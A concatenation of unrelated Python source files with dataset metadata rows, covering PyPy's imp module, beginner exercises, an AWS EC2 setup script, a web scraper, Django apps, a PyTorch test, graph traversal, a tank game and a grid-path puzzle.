from pypy.interpreter.streamutil import wrap_streamerror
def get_suffixes(space):
suffixes_w = []
if importing.has_so_extension(space):
suffixes_w.append(
space.newtuple([space.newtext(importing.get_so_extension(space)),
space.newtext('rb'),
space.newint(importing.C_EXTENSION)]))
suffixes_w.extend([
space.newtuple([space.newtext('.py'),
space.newtext('U'),
space.newint(importing.PY_SOURCE)]),
space.newtuple([space.newtext('.pyc'),
space.newtext('rb'),
space.newint(importing.PY_COMPILED)]),
])
return space.newlist(suffixes_w)
def get_magic(space):
x = importing.get_pyc_magic(space)
a = x & 0xff
x >>= 8
b = x & 0xff
x >>= 8
c = x & 0xff
x >>= 8
d = x & 0xff
return space.newbytes(chr(a) + chr(b) + chr(c) + chr(d))
def get_file(space, w_file, filename, filemode):
if space.is_none(w_file):
try:
return streamio.open_file_as_stream(filename, filemode)
except StreamErrors as e:
# XXX this is not quite the correct place, but it will do for now.
# XXX see the issue which I'm sure exists already but whose number
# XXX I cannot find any more...
raise wrap_streamerror(space, e)
else:
return space.interp_w(W_File, w_file).stream
def find_module(space, w_name, w_path=None):
name = space.text0_w(w_name)
if space.is_none(w_path):
w_path = None
find_info = importing.find_module(
space, name, w_name, name, w_path, use_loader=False)
if not find_info:
raise oefmt(space.w_ImportError, "No module named %s", name)
w_filename = space.newtext(find_info.filename)
stream = find_info.stream
if stream is not None:
fileobj = W_File(space)
fileobj.fdopenstream(
stream, stream.try_to_find_file_descriptor(),
find_info.filemode, w_filename)
w_fileobj = fileobj
else:
w_fileobj = space.w_None
w_import_info = space.newtuple(
[space.newtext(find_info.suffix),
space.newtext(find_info.filemode),
space.newint(find_info.modtype)])
return space.newtuple([w_fileobj, w_filename, w_import_info])
def load_module(space, w_name, w_file, w_filename, w_info):
w_suffix, w_filemode, w_modtype = space.unpackiterable(w_info, 3)
filename = space.fsencode_w(w_filename)
filemode = space.text_w(w_filemode)
if space.is_w(w_file, space.w_None):
stream = None
else:
stream = get_file(space, w_file, filename, filemode)
find_info = importing.FindInfo(
space.int_w(w_modtype),
filename,
stream,
space.text_w(w_suffix),
filemode)
return importing.load_module(
space, w_name, find_info, reuse=True)
def load_source(space, w_modulename, w_filename, w_file=None):
filename = space.fsencode_w(w_filename)
stream = get_file(space, w_file, filename, 'U')
w_mod = Module(space, w_modulename)
importing._prepare_module(space, w_mod, filename, None)
w_mod = importing.load_source_module(
space, w_modulename, w_mod,
filename, importing._wrap_readall(space, stream),
stream.try_to_find_file_descriptor())
if space.is_none(w_file):
importing._wrap_close(space, stream)
return w_mod
@unwrap_spec(filename='fsencode', check_afterwards=int)
def _run_compiled_module(space, w_modulename, filename, w_file, w_module,
check_afterwards=False):
# the function 'imp._run_compiled_module' is a pypy-only extension
stream = get_file(space, w_file, filename, 'rb')
magic = importing._wrap_r_long(space, stream)
timestamp = importing._wrap_r_long(space, stream)
w_mod = importing.load_compiled_module(
space, w_modulename, w_module, filename, magic, timestamp,
importing._wrap_readall(space, stream),
check_afterwards=check_afterwards)
if space.is_none(w_file):
importing._wrap_close(space, stream)
return w_mod
@unwrap_spec(filename='fsencode')
def load_compiled(space, w_modulename, filename, w_file=None):
w_mod = Module(space, w_modulename)
importing._prepare_module(space, w_mod, filename, None)
return _run_compiled_module(space, w_modulename, filename, w_file, w_mod,
check_afterwards=True)
@unwrap_spec(filename='fsencode')
def load_dynamic(space, w_modulename, filename, w_file=None):
if not importing.has_so_extension(space):
raise oefmt(space.w_ImportError, "Not implemented")
return importing.load_c_extension(space, filename,
space.text_w(w_modulename))
def new_module(space, w_name):
return Module(space, w_name, add_package=False)
def init_builtin(space, w_name):
name = space.text0_w(w_name)
if name not in space.builtin_modules:
return
if space.finditem(space.sys.get('modules'), w_name) is not None:
raise oefmt(space.w_ImportError,
"cannot initialize a built-in module twice in PyPy")
return space.getbuiltinmodule(name)
def init_frozen(space, w_name):
return None
def is_builtin(space, w_name):
name = space.text0_w(w_name)
if name not in space.builtin_modules:
return space.newint(0)
if space.finditem(space.sys.get('modules'), w_name) is not None:
return space.newint(-1) # cannot be initialized again
return space.newint(1)
def is_frozen(space, w_name):
return space.w_False
#__________________________________________________________________
def lock_held(space):
if space.config.objspace.usemodules.thread:
return space.newbool(importing.getimportlock(space).lock_held_by_anyone())
else:
return space.w_False
def acquire_lock(space):
if space.config.objspace.usemodules.thread:
importing.getimportlock(space).acquire_lock()
def release_lock(space):
if space.config.objspace.usemodules.thread:
importing.getimportlock(space).release_lock(silent_after_fork=False)
def reinit_lock(space):
if space.config.objspace.usemodules.thread:
importing.getimportlock(space).reinit_lock()
| mozillazg/pypy | pypy/module/imp/interp_imp.py | interp_imp.py | py | 6,658 | python | en | code | 430 | github-code | 36 |
37077548561 | #!/usr/bin/env python
# coding: utf-8
# 1. Write a Python Program to Find the Factorial of a Number?
# In[7]:
num=int(input("Ente the no to check its factorial"))
factorial=1
#check if no is negative
if num<0:
print("No foractor for negative no")
if num == 0:
print("Factorial of 0 is 1")
if num > 0:
for i in range(1,num+1):
factorial=i*factorial
print("The Factorial of",num,"is",factorial)
# 2. Write a Python Program to Display the multiplication Table?
# In[9]:
num=int(input("Enter the no for multiplication Table"))
for i in range(1,num):
print(num,"=",i,"X",num,"=",num*i)
# 3. Write a Python Program to Print the Fibonacci sequence?
# In[14]:
nterm=int(input("Enter How many terms?"))
n1,n2=0,1
count=0
#check the terms is valid
if nterm <=0:
print("Please enter a positive interger")
elif nterm==1:
print("Fibbonacci sequence upto",nterm,":")
print(n1)
else:
print("Fibonacci sequence:")
while count < nterm:
print(n1)
nth = n1 + n2
# update values
n1=n2
n2 = nth
count += 1
# 4. Write a Python Program to Check Armstrong Number?
# In[15]:
num = int(input("Enter the no to check for Armstrong no"))
sum=0
temp=num
while temp >0:
digit = temp % 10
sum = sum + digit **3
temp = temp/10
if num==sum:
print(num,"is the Amstrong no")
else:
print(num,"is not a Amstrong no")
# 5. Write a Python Program to Find Armstrong Number in an Interval?
# In[25]:
lower = 100
upper= 2000
for num in range(lower,upper +1):
order = len(str(num))
sum =0
temp =num
while temp > 0:
digit = temp % 10
sum = sum + digit **order
temp//= 10
if num==sum:
print(num)
# 6. Write a Python Program to Find the Sum of Natural Numbers?
# In[33]:
num=int(input("Enter the number"))
if num < 0:
print("Enter the Positive no")
else:
sum=0
while num > 0:
sum= sum + num
num = num-1
print("The sum is: ",sum)
# In[ ]:
| ralfsayyed/Inuron_programming_Assingments | Programming Assignment 4.py | Programming Assignment 4.py | py | 2,042 | python | en | code | 0 | github-code | 36 |
16772279994 | import urllib
import boto3
from botocore.exceptions import ClientError
ec2 = boto3.client("ec2")
def get_my_public_ip():
external_ip = urllib.request.urlopen(
'https://ident.me').read().decode('utf8')
print('Public ip - ', external_ip)
return external_ip
def create_key_pair(name):
try:
response = ec2.create_key_pair(
KeyName=name,
KeyType="rsa",
)
with open(f"{name}.pem", "w") as file:
file.write(response.get("KeyMaterial"))
print(f"{name} Key has been crated")
return response.get("KeyPairId")
except ClientError as e:
print(e)
return
def create_security_group(client, name, description, vpc_id):
response = client.create_security_group(
Description=description,
GroupName=name,
VpcId=vpc_id)
group_id = response.get('GroupId')
print('Security Group Id - ', group_id)
return group_id
def add_ssh_access_sg(client, sg_id, ip_address):
ip_address = f'{ip_address}/32'
response = client.authorize_security_group_ingress(
CidrIp=ip_address,
FromPort=22,
GroupId=sg_id,
IpProtocol='tcp',
ToPort=22,
)
if response.get('Return'):
print('Rule added successfully')
else:
print('Rule was not added')
def add_http_access_sg(client, sg_id):
ip_address = '0.0.0.0/0'
response = client.authorize_security_group_ingress(
CidrIp=ip_address,
FromPort=80,
GroupId=sg_id,
IpProtocol='tcp',
ToPort=80,
)
if response.get('Return'):
print('Rule added successfully')
else:
print('Rule was not added')
def create_security_group(client, name, description, vpc_id):
response = client.create_security_group(
Description=description,
GroupName=name,
VpcId=vpc_id)
group_id = response.get('GroupId')
print('Security Group Id - ', group_id)
return group_id
def create_instance(client, group_id, subnet_id):
response = client.run_instances(
BlockDeviceMappings=[{'DeviceName': '/dev/sdh',
'Ebs': {'DeleteOnTermination': True,
'VolumeSize': 10,
'VolumeType': 'gp2',
'Encrypted': False}
}],
ImageId='ami-0022f774911c1d690',
InstanceType='t2.micro',
KeyName='my-key',
InstanceInitiatedShutdownBehavior='terminate',
MaxCount=1,
MinCount=1,
NetworkInterfaces=[
{
'AssociatePublicIpAddress': True,
'DeleteOnTermination': True,
'Description': 'string',
'Groups': [
group_id
],
'DeviceIndex':0,
'SubnetId':subnet_id
},
])
for instance in response.get('Instances'):
instance_id = instance.get('InstanceId')
print('InstanceId - ', instance_id)
def main(vpc_id, subnet_id):
group_id = create_security_group(ec2, 'my', 'grp', vpc_id)
add_http_access_sg(ec2, group_id)
my_ip = get_my_public_ip()
add_ssh_access_sg(ec2, group_id, my_ip)
create_instance(ec2, group_id, subnet_id)
if __name__ == '__main__':
main("vpc-id", "subnet-id")
| annatezelashvili/AWS_Python_Automation | Tasks/Task10-11/create_ec2.py | create_ec2.py | py | 3,423 | python | en | code | 0 | github-code | 36 |
35217252222 | from enum import IntEnum
import requests
from urllib.request import urlopen
import urllib
from selenium import webdriver
from bs4 import BeautifulSoup
import http.client
from openpyxl import Workbook
from openpyxl import load_workbook
from openpyxl.writer.excel import ExcelWriter
from openpyxl.cell.cell import ILLEGAL_CHARACTERS_RE
import json
from functools import reduce
import string
import re
import time
import math
http.client._MAXHEADERS = 1000
def urllib_download(IMAGE_URL, pName):
try:
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
urllib.request.install_opener(opener)
urllib.request.urlretrieve(IMAGE_URL, pName.replace("/","").replace("\\","")+'.jpg')
except:
print('no')
def getNodeText(node):
if(node == None):
return ""
else:
return node.get_text().strip()
retryCount = 0
def requestJson(url):
r = requests.get(url, headers={
'Content-Type': 'application/json; charset=utf-8',
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"
})
datas = json.loads(r.text)
return datas
def writeExcel(workSheet, headers, rowIndex, info):
cellIndex=1
for head in headers:
try:
if head in info:
content = ILLEGAL_CHARACTERS_RE.sub(r'', info[head])
workSheet.cell(rowIndex, cellIndex).value = content.strip()
else:
workSheet.cell(rowIndex, cellIndex).value = ""
cellIndex=cellIndex+1
except:
print(rowIndex)
def getProductList(url, products):
print(url)
data = requestJson(url)
for pInfoData in data["data"]:
attrInfo = pInfoData["attributes"]
uId = attrInfo["uuid"]
pInfoDetail = requestJson("https://unc.flintbox.com/api/v1/technologies/"+uId+"?organizationId=123&organizationAccessKey=710fd77b-1f7c-41f3-a76e-c5fa43853596")
includes = pInfoDetail["included"]
member = reduce(lambda m, cur: cur if cur["type"] == "member" else m, includes, None)
connector = reduce(lambda m, cur: cur if cur["type"] == "contact" else m, includes, None)
pInfo = {
"Title": attrInfo["name"],
"Published": attrInfo["publishedOn"],
"Webpage": "https://unc.flintbox.com/technologies/"+uId,
"Inventor(s)": member["attributes"]["fullName"] if member != None else '',
"Licensing Contact Person": connector["attributes"]["fullName"] if connector != None else '',
"Licensing Contact Email": connector["attributes"]["email"] if connector != None else '',
}
products.append(pInfo.copy())
excelFileName="otcuncedu.xlsx"
wb = Workbook()
workSheet = wb.active
products = []
headers=[
'Title','Published','Webpage','Inventor(s)','Licensing Contact Person','Licensing Contact Email','备注'
]
# getProductList("https://unc.flintbox.com/api/v1/technologies?organizationId=123&organizationAccessKey=710fd77b-1f7c-41f3-a76e-c5fa43853596&page=1&query=", products)
for pageIndex in range(1, 14):
getProductList("https://unc.flintbox.com/api/v1/technologies?organizationId=123&organizationAccessKey=710fd77b-1f7c-41f3-a76e-c5fa43853596&page="+str(pageIndex)+"&query=", products)
for index,head in enumerate(headers):
workSheet.cell(1, index+1).value = head.strip()
for index,p in enumerate(products):
writeExcel(workSheet, headers, index + 2, p)
print("flish")
wb.save(excelFileName) | Just-Doing/python-caiji | src/work/20210807/otcuncedu.py | otcuncedu.py | py | 3,301 | python | en | code | 1 | github-code | 36 |
71104422184 | #!/usr/bin/env python
# -*- coding=UTF-8 -*-
# Created at Mar 20 19:50 by BlahGeek@Gmail.com
import sys
if hasattr(sys, 'setdefaultencoding'):
sys.setdefaultencoding('UTF-8')
import logging
from datetime import datetime, timedelta
from treehole.renren import RenRen
import os
from treehole.models import ContentModel, BlockIpModel
from ipaddr import IPNetwork, IPAddress
def needRecaptchar(addr, content):
if ContentModel.objects.filter(
ip=addr,
time__range=(datetime.now()-timedelta(hours=24), \
datetime.now())
).count() > 2:
return True
return False
def checkIP(addr):
IPS = (
IPNetwork('59.66.0.0/16'),
IPNetwork('166.111.0.0/16'),
IPNetwork('101.5.0.0/16'),
IPNetwork('219.223.160.0/19'),
# private address
IPNetwork('127.0.0.0/8'),
IPNetwork('10.0.0.0/8'),
IPNetwork('192.168.0.0/16'),
)
if BlockIpModel.objects.filter(ip=addr).count() > 0:
return False
return any([IPAddress(addr) in x for x in IPS])
def postRawStatu(text):
""" Post status without number, without saving to db"""
r = RenRen()
r.postStatus(text)
def postStatu(text, ipaddr='127.0.0.1'):
""" Post status, start with '#xxx', saving to db"""
new_content = ContentModel(ip=ipaddr,
time=datetime.now(),
content=text)
new_content.save()
number = ContentModel.objects.count()
text = '#' + str(number) + ' ' + text
postRawStatu(text)
MSG = {
'IP_NOT_VALID': '不允许您的IP发布',
'CONTENT_TOO_LONG': '状态长度应该在6-100字之间',
'TOO_MANY_TIMES': '每个IP相邻发布时间不能小于30分钟',
'PUBLISH_ERROR': '服务器错误,发布失败',
'RECAPTCHA_INCORRECT': '验证码错误',
'RECAPTCHA_NEEDED': '请输入验证码',
'PUBLISH_OK': '发布成功!'}
COLORS = [
('#1abc9c', '#16a085'),
('#2ecc71', '#27ae60'),
('#3498DB', '#2980B9'),
('#9B59B6', '#8E44AD'),
('#34495E', '#2C3E50'),
('#F1C40F', '#F39C12'),
('#E67E22', '#D35400'),
('#E74C3C', '#C0392B'),
('#95A5A6', '#7F8C8D')
]
| blahgeek/treehole | treehole/utils.py | utils.py | py | 2,317 | python | en | code | 30 | github-code | 36 |
6697035634 | from models.arch.network import Network
from torch.nn import functional as F
import torch
model = Network(stage=2, depth=8).cuda()
model.set_query_codebook()
model.load_state_dict(torch.load("./pretrained_models/LOLv1.pth"))
x = torch.ones(1, 3, 256, 256).cuda()
with torch.no_grad():
M = F.relu(x - model.thr_conv(x))
f1, f2, f3 = model.encode(x)
fq, distance_map = model.vq_64.forward_with_query(f3, model.query)
f1_d, f2_d, f3_d = model.decode(fq)
f1_cat = model.fusion_128([model.up_fusion_2(f3), f2, f2_d, model.down_fusion_local(f1), model.down_fusion_prior(f1_d)])
f1_f = model.decoder_128_fusion(f1_cat)
f1_f_wo_ba = f1_f
f1_f = f1_f + f1_f * model.BA_128(M)
f2_cat = torch.cat([model.up_fusion_3(f1_f), f1, f1_d, model.up_fusion_local(f2), model.up_fusion_prior(f2_d)])
f2_f = model.decoder_256_fusion(f2_cat)
f2_f = f2_f + f2_f * model.BA_256(M)
x_rec = model.conv_fusion_out(f2_f)
ckpt = torch.load("/home/liuyunlong/project/code/SNR-Aware-Low-Light-Enhance-main/ckpt.pth")
dic = {'feat_256': f1, 'feat_128': f2, 'feat_64': f3, 'feat_q': fq, 'decode_64': f3_d, 'decode_128': f2_d,
'decode_256': f1_d, 'fusion_128': f1_f, 'fusion_256': f2_f, 'fusion_128_wo_ba': f1_f_wo_ba}
for item in dic:
print(f"{item}-->{torch.equal(dic[item], ckpt[item])}")
| TaoHuang95/RQ-LLIE | test.py | test.py | py | 1,359 | python | en | code | null | github-code | 36 |
4615311890 | from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name = "home"),
path('shop/', views.shop, name = "shop"),
path('about/', views.about, name = "about"),
path('contact/', views.contact, name = "contact"),
path('faq/', views.faq, name = "faq"),
] | brownlenox/djangostaticfiles | mainapp/urls.py | urls.py | py | 302 | python | en | code | 0 | github-code | 36 |
39647238473 |
from django.urls import path
from .views import newpost_add, post_list, post_detail, post_update,post_delete,about_page, post_like
urlpatterns = [
path('add', newpost_add, name='add'),
path('', post_list, name='list'),
path('detail/<int:id>', post_detail, name='detail'),
path('update/<int:id>', post_update, name='update'),
path('delete/<int:id>', post_delete, name='delete'),
path('about', about_page, name='about'),
path('like/<int:id>', post_like, name="post_like")
] | yildirimesutx/Django_Blog_Project_102 | blog/urls.py | urls.py | py | 501 | python | en | code | 0 | github-code | 36 |
7795634258 | # -*- coding: utf-8 -*-
# Author: sunmengxin
# time: 10/17/18
# file: 图的遍历.py
# description:
'''
深度优先遍历和广度优先遍历
'''
# 递归遍历
def DFS(i,n,map,visit):
for j in range(n):
if map[i][j] == 1 and visit[j] == 0:
visit[j] = 1
print(j, end='\t')
DFS(j,n,map,visit)
return
# 有问题
# def DFS_stack(i,n,map,visit):
# stack = [i]
# while(len(stack) != 0):
# i = stack[-1]
# for j in range(n):
# if visit[j] == 0 and map[i][j] == 1:
# stack.append(j)
# visit[j] = 1
# print(j,end='\t')
# stack.pop()
def BFS(i,n,map,visit):
queue = [i]
while len(queue) != 0:
i = queue[0]
del queue[0]
for j in range(n):
if map[i][j] == 1 and visit[j] == 0:
queue.append(j)
visit[j] = 1
print(j,end='\t')
if __name__ == '__main__':
n,m = input().split()
n,m = int(n), int(m)
map = [[-1 for _ in range(n)] for _ in range(n)]
visit = [0 for _ in range(n)]
for _ in range(m):
a,b = input().split(' ')
map[int(a)-1][int(b)-1] = 1
map[int(b)-1][int(a)-1] = 1
# for i in range(n):
# if visit[i] == 0:
# visit[i] = 1
# print(i,end='\t')
# DFS+BFS(i,n,map,visit)
for i in range(n):
if visit[i] == 0:
visit[i] = 1
print(i,end='\t')
BFS(i,n,map,visit)
'''
9 14
1 2
1 6
2 3
2 7
2 9
3 4
3 9
4 5
4 7
4 8
4 9
5 6
5 8
6 7
'''
| 20130353/Leetcode | graph/图的遍历.py | 图的遍历.py | py | 1,615 | python | en | code | 2 | github-code | 36 |
29271028676 | from tank_class import Tank
import os
choice = 'Y'
while choice == 'Y':
os.system('clear')
player1 = input('Name of Player 1: ')
player2 = input('Name of Player 2: ')
player3 = input('Name of Player 3: ')
p1, p2, p3 = Tank(player1, 20, 50), Tank(player2, 20, 50), Tank(player3, 20, 50)
all_tanks = {
'A' : p1,
'B' : p2,
'C' : p3
}
alive_tanks = len(all_tanks)
def check_in_alltanks(tank):
if tank.upper() not in all_tanks.keys():
print (f'There is no tank named {tank}')
return 0
else:
return 1
while alive_tanks > 1:
print ('\n')
print ('*' * 45)
print ('\n')
for key, value in sorted(all_tanks.items()):
print (key + '-->' + str(value))
first = str(input('Who Fires ? '))
if check_in_alltanks(first) == 0:
continue
first_tank = all_tanks[first.upper()]
if first_tank.check_if_alive() == 0:
continue
second = str(input(f'{first_tank.tank_name} fires at whom ? '))
if check_in_alltanks(second) == 0:
continue
second_tank = all_tanks[second.upper()]
if second_tank.check_if_alive() == 0:
continue
if first_tank == second_tank:
print (f"{first_tank.tank_name} can't fire at itself")
continue
print ('\n')
print ('*' * 45)
print ('\n')
first_tank.fire_at(second_tank)
if not second_tank.alive:
alive_tanks -= 1
print ('\n')
print ('*' * 45)
print ('\n')
for tank in all_tanks.values():
if tank.alive:
print (str(tank) + 'is the Winner !!!')
break
choice = str(input('Do you want to play again (Y / N) ? ')).upper()
| SubhamK108/Python-3 | Games/The Tank Game/tank_game.py | tank_game.py | py | 1,820 | python | en | code | 0 | github-code | 36 |
74090977062 | import math
from datetime import datetime
import firebase_admin
from firebase_admin import credentials
from firebase_admin import db
from firebase_admin import firestore
import parseIntervalFiles as pif
import parseActivityFiles as paf
hervdir = "C:\\Users\\Ju\\GDrive\\Projects\\HeRV\\"
## Firestore connection parameters
keyfile = hervdir + "Docs\\herv-3c5ea-firebase-adminsdk-99tjk-98193df3d9.json"
databaseURL = 'https://herv-3c5ea.firebaseio.com'
## CSV file reading parameters
source = hervdir + "Data\\Raw\\"
start_dt = datetime(2017, 10, 29)
end_dt = datetime(2018, 11, 1)
def u_ref(db, uid):
return db.collection('users').document(str(uid))
def add_sessions(uid, start_dt, end_dt, source, dest):
u_sess = paf.get_sessions(uid, start_dt, end_dt, source, verbose=False)
print('adding', len(u_sess), 'sessions for user', uid)
s_ref = u_ref(dest, uid).collection('sessions')
b = dest.batch()
for sess in u_sess:
name = paf.csvu.string_from_time_filename(sess['start'])
doc = s_ref.document(name)
b.set(doc, sess)
b.commit()
def add_intervals(uid, start_dt, end_dt, source, dest):
for day in pif.csvu.gendays(start_dt, end_dt):
add_day_intervals(uid, day, source, dest)
print ("finished adding intervals for user", uid)
def add_day_intervals(uid, day, source, dest):
day_rr = pif.get_day_intervals(uid, day, source)
if len(day_rr) > 0:
dayname = datetime.strftime(day, "%Y%m%d")
print(len(day_rr), 'RR intervals in', dayname)
rr_ref = u_ref(dest, uid).collection('rr')
rr_ref.document(dayname).set({'rr_count': len(day_rr)})
mref = rr_ref.document(dayname).collection('minutes')
for min_batch in batch(group_by_minute(day_rr)):
print ('adding batch with', len(min_batch), 'minutes')
gr = dest.batch()
for (k, v) in min_batch:
doc = mref.document(k)
gr.set(doc, v)
gr.commit()
def batch(d, n=500):
x = len(d)
l = list(d.items())
for ndx in range(0, x, n):
yield l[ndx:min(ndx + n, x)]
def group_by_minute(dayrr):
d = {}
#TODO obviously, this can be done without looping by splitting the list by h,m
for h in range(24):
for m in range(60):
mrr = [x for x in dayrr if x['date'].hour == h and x['date'].minute == m]
if len(mrr) > 0:
miname = str(str(h).zfill(2) + str(m).zfill(2))
mi = {}
for s in range(60):
srr = [x['interval'] for x in mrr if x['date'].second == s]
if len(srr) > 0:
mi[str(s)] = srr
d[miname] = mi
return d
## Initializing a client to communicate with Firestore
cred = credentials.Certificate(keyfile)
default_app = firebase_admin.initialize_app(cred, options={'databaseURL': databaseURL})
client = firestore.client()
print ("Connected to Firestore...")
## for each user id in the database, search for sessions and intervals in csvs
users = client.collection('users')
userlist = [int(doc.id) for doc in users.get()]
for uid in userlist:
print("\n\nUSER", uid, "\n\n")
add_sessions(uid, start_dt, end_dt, source, client)
add_intervals(uid, start_dt, end_dt, source, client)
| jucc/HeRV_analysis | pipeline/convert_csv_firestore.py | convert_csv_firestore.py | py | 3,459 | python | en | code | 1 | github-code | 36 |
17176681083 | import os
import logging
from logging import handlers
from api.common.jsonFormatter import JsonFormatter
# json形式で出力するログファイル
class Api_logger_json():
def __init__(self, name):
super().__init__()
# ログ取得
self.log = logging.getLogger(name + "_json")
if not self.log.hasHandlers():
# ログレベル
self.log.setLevel(logging.INFO)
# handrer追加
# ベースパス取得
bath_pash = os.getcwd()
# 日付ローテーションおよび7日
# jsonにする場合、日本語が文字化けするのでライブライリーを修正する必要がある
# 「json_log_formatter」ディレクトリ内の「__init__.py」の「to_json」のreturnメソッドに
# [, ensure_ascii=False]を追加
# ライブラリの場所は、[pip show パッケージ名]でわかる
file_handler = logging.handlers.TimedRotatingFileHandler(
filename=bath_pash + '/log/app_json.log', encoding='UTF-8', when='MIDNIGHT', backupCount=7)
# 日本語出力対応
formatter = JsonFormatter(json_ensure_ascii=False)
file_handler.setFormatter(formatter)
self.log.addHandler(file_handler)
def getLogger(self):
return self.log
| war-bonds-rx78/python_flask_db_sample | api/common/logger_json.py | logger_json.py | py | 1,381 | python | ja | code | 0 | github-code | 36 |
8402296505 | from argparse import ArgumentParser
import json, logging
import seeker.podSeeker as Seeker
import judge.simpleJudge as Judge
import updater.simpleUpdater as Updater
class installed_query_info():
def __init__(self, query_id, src_id, dst_id):
self.query_id = query_id
self.src_id = src_id
self.dst_id = dst_id
# initialize switch perference weight
def init_env():
total_switch_size = 20
switch_weights = [0] * total_switch_size
switch_loads = [0] * total_switch_size
for i in range(total_switch_size):
switch_loads[i] = []
return switch_weights, switch_loads
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument("-q", "--query", help="Query input file location", dest="query_location", default="./data/queries.json")
args = parser.parse_args()
logging.basicConfig(level=logging.INFO)
switch_weights, switch_loads = init_env()
with open(args.query_location, 'r') as inputQueries:
unparsed_queries = inputQueries.read()
queries = json.loads(unparsed_queries)
for query in queries:
edge_sw1, edge_sw2 = Seeker.find_edge_switch_on_path(
switch_id1=query['src_host_id'],
switch_id2=query['dst_host_id'],
pod_scale=4)
aggr_sw1, aggr_sw2 = Seeker.find_aggr_switch_on_path(
edge_id1=edge_sw1,
edge_id2=edge_sw2,
pod_scale=4)
core_sws = Seeker.find_core_switch_on_path(pod_scale=4)
edge_weight_1 = switch_weights[edge_sw1]
edge_weight_2 = switch_weights[edge_sw2]
aggr_weight_1, aggr_weight_2, core_weight = 0, 0, 0
hybrid_weight_1, hybrid_weight_2, hybrid_weight_3, hybrid_weight_4 = 0, 0, 0, 0
for aggr_sw in aggr_sw1:
aggr_weight_1 += switch_weights[aggr_sw]
for aggr_sw in aggr_sw2:
aggr_weight_2 += switch_weights[aggr_sw]
for core_sw in core_sws:
core_weight += switch_weights[core_sw]
hybrid_sw1 = [aggr_sw1[0], core_sws[0], core_sws[1]]
hybrid_sw2 = [aggr_sw1[1], core_sws[2], core_sws[3]]
hybrid_sw3 = [aggr_sw2[0], core_sws[0], core_sws[1]]
hybrid_sw4 = [aggr_sw2[1], core_sws[2], core_sws[3]]
for sw_id in hybrid_sw1:
hybrid_weight_1 += switch_weights[sw_id]
for sw_id in hybrid_sw2:
hybrid_weight_2 += switch_weights[sw_id]
for sw_id in hybrid_sw3:
hybrid_weight_3 += switch_weights[sw_id]
for sw_id in hybrid_sw4:
hybrid_weight_4 += switch_weights[sw_id]
chosen_pos = Judge.find_lowest_cost_node(
[edge_weight_1, edge_weight_2, aggr_weight_1, aggr_weight_2, core_weight,
hybrid_weight_1, hybrid_weight_2, hybrid_weight_3, hybrid_weight_4],
[edge_sw1, edge_sw2, aggr_sw1, aggr_sw2, core_sws, hybrid_sw1, hybrid_sw2,
hybrid_sw3, hybrid_sw4])
Updater.update_weight(weights=switch_weights, pos=chosen_pos)
installed_query = installed_query_info(query_id=query['query_id'],
src_id=query['src_host_id'], dst_id=query['dst_host_id'])
if isinstance(chosen_pos, list):
for pos in chosen_pos:
switch_loads[pos].append(installed_query)
elif isinstance(chosen_pos, int):
switch_loads[chosen_pos].append(installed_query)
# print results
print("####### Control Plane Placement Results #######")
for index, loads in enumerate(switch_loads):
if len(loads) > 0:
print("Switch %d got %d tasks" % (index, len(loads)))
'''
for load in loads:
if isinstance(load, installed_query_info):
print("Switch %d install query no.%d, from host %d to host %d" %
(index, load.query_id, load.src_id, load.dst_id))
'''
| In-Net/NQATP | stimulator/easy_seeker.py | easy_seeker.py | py | 3,891 | python | en | code | 0 | github-code | 36 |
8458106104 | """Princess Peach is trapped in one of the four corners of a square grid. You are in the center of the grid and can move
one step at a time in any of the four directions. Can you rescue the princess?
Input format
The first line contains an odd integer N (3 <= N < 100) denoting the size of the grid. This is followed by an NxN grid.
Each cell is denoted by '-' (ascii value: 45). The bot position is denoted by 'm' and the princess position is denoted by 'p'.
Grid is indexed using Matrix Convention
Output format
Print out the moves you will take to rescue the princess in one go. The moves must be separated by '\n', a newline.
The valid moves are LEFT or RIGHT or UP or DOWN.
Sample input
>>> 3
>>> ---
>>> -m-
>>> p--
Sample output
DOWN
LEFT
Task
Complete the function displayPathtoPrincess which takes in two parameters - the integer N and the character array grid.
The grid will be formatted exactly as you see it in the input, so for the sample input the princess is at grid[2][0].
The function shall output moves (LEFT, RIGHT, UP or DOWN) on consecutive lines to rescue/reach the princess. The goal
is to reach the princess in as few moves as possible.
The above sample input is just to help you understand the format. The princess ('p') can be in any one of the four corners.
Scoring
Your score is calculated as follows : (NxN - number of moves made to rescue the princess)/10, where N is the size of
the grid (3x3 in the sample testcase).
Solved score: 13.90pts
Submissions: 80065
Max Score: 13
Difficulty: Easy
Rate This Challenge:
More
"""
def displayPathtoPrincess(n, grid):
# find the position of the bot and the princess
for i in range(n):
for j in range(n):
if grid[i][j] == 'm':
bot_position = (i, j)
elif grid[i][j] == 'p':
princess_position = (i, j)
# find the difference between the bot and the princess
diff = (princess_position[0] - bot_position[0], princess_position[1] - bot_position[1])
answer = ''
# move the bot to the princess
if diff[0] > 0:
for i in range(diff[0]):
answer += 'DOWN'
answer += '\n'
elif diff[0] < 0:
for i in range(abs(diff[0])):
answer += 'UP'
answer += '\n'
if diff[1] > 0:
for i in range(diff[1]):
answer += 'RIGHT'
answer += '\n'
elif diff[1] < 0:
for i in range(abs(diff[1])):
answer += 'LEFT'
answer += '\n'
return answer
if __name__ == '__main__':
print('Welcome to the Bot Save Princess Challenge!')
print('Test mode? (y/n): ')
test_mode = input()
if test_mode == 'y':
# test mode
test_cases = [
{
'grid_size': 4,
'grid': [
'----',
'--m-',
'----',
'p---'
],
'expected_output': 'DOWN\nDOWN\nLEFT\nLEFT\n'
},
]
answer = displayPathtoPrincess(test_cases[0]['grid_size'], test_cases[0]['grid'])
print('Answer: ', answer)
print('Expected answer: ', test_cases[0]['expected_output'])
if answer == test_cases[0]['expected_output']:
print('Test case 1 passed!')
assert answer == test_cases[0]['expected_output']
else:
# prompt user to enter grid size, which is an odd integer N (3 <= N < 100) denoting the size of the grid
print("Enter the grid size: ")
grid_size = int(input())
# prompt user to enter grid, which is an NxN grid. Each cell is denoted by '-' (ascii value: 45). The bot position
# is denoted by 'm' and the princess position is denoted by 'p'.
print("Enter the grid: ")
grid = []
for i in range(grid_size):
grid.append(input().strip())
print(grid)
displayPathtoPrincess(grid_size, grid) | namhoangle/coding-challenges | bot-save-princess.py | bot-save-princess.py | py | 3,972 | python | en | code | 0 | github-code | 36 |
6128705889 | import random
